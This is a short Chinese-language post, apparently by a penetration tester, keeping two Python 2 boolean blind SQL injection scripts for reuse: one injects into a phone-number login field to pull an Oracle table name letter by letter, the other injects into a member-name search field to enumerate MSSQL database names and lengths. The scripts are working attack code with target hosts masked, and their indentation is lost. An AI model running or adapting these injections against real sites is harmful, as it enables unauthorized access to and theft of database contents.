记录最近项目写的几个盲注脚本,方便以后使用
1、ORACLE布尔型盲注
import urllib
import urllib2
import requests
payloads = '_ABCDEFGHIJKLMNOPQRSTUVWXYZ'
header = { 'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' }
values={}
print 'Start to retrive database:'
database= ''
#需要先手工判断当前表名长度
for i in range(1, 21):
for payload in payloads:
try:
values['loginType']='2'
values['password']='12345678'
values['phoneNumber']="' or (select substr(table_name,%s,1) from user_tables where rownum=1)='%s' and '1'='1" % (str(i),str(payload))
data = urllib.urlencode(values)
url = "https://xxx.xxx.xxx.xxx/api/xxx/reg/action/xxx/appUserLogin.json"
req = urllib2.Request(url,data=data,headers=header)
resp = urllib2.urlopen(req).read()
#匹配关键字输出正确的数据库名
if "status" in resp:
database += payload
print 'the database is:'+ database
break
else:
print 'dumping database...'
except Exception,e:
print e
2、MSSQL布尔型盲注
import urllib
import urllib2
import requests
payloads = 'abcdefghijklmnopqrstuvwxyz_'
header = {'User-Agent':'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','Cookie':'ASP.NET_SessionId=4vmyjpbw03vk2aq0q5mlbemy'}
values={}
print 'Start to retrive database:'
user= ''
length=[]
databases=[]
db=''
#注出数据库
def dump_db(i,j):
global db
for n in range(1,j+1):
for payload in payloads:
try:
values['txtMemberName']="xxx%' and (select count(*) from master.dbo.sysdatabases where dbid={0} and substring(name,{1},1)='{2}')=1--".format(i,n,payload)
data = urllib.urlencode(values)
url = "http://xxx.xxx.xxx/HR/xxx/xxx.aspx"
req = urllib2.Request(url,data=data,headers=header)
resp = urllib2.urlopen(req).read()
if "Robert" in resp:
db += payload
print db
if n == j:
databases.append(db)
db=''
break
else:
print 'dumping database...'
except Exception,e:
print e
#遍历判断数据库的长度,需要手工判断数据库个数
for i in range(1,19):
for j in range(1,16):
try:
values['txtMemberName']="xxx%' and (select count(*) from master.dbo.sysdatabases where dbid={0} and len(name)={1})=1--".format(i,j)
data = urllib.urlencode(values)
url = "http://xxx.xxx.xxx/HR/xxx/xxx.aspx"
req = urllib2.Request(url,data=data,headers=header)
#print req
resp = urllib2.urlopen(req).read()
#print resp
if "Robert" in resp:
print 'the length of DB_%s is %s' % (str(i),str(j))
dump_db(i,j)
#print 'the DB is: %s' % str(db)
length.append(j)
break
else:
print 'dumping length...'
except Exception,e:
print e
print '-------------------------'
for ddd in range(0,17):
print databases[ddd]
print '-------------------------'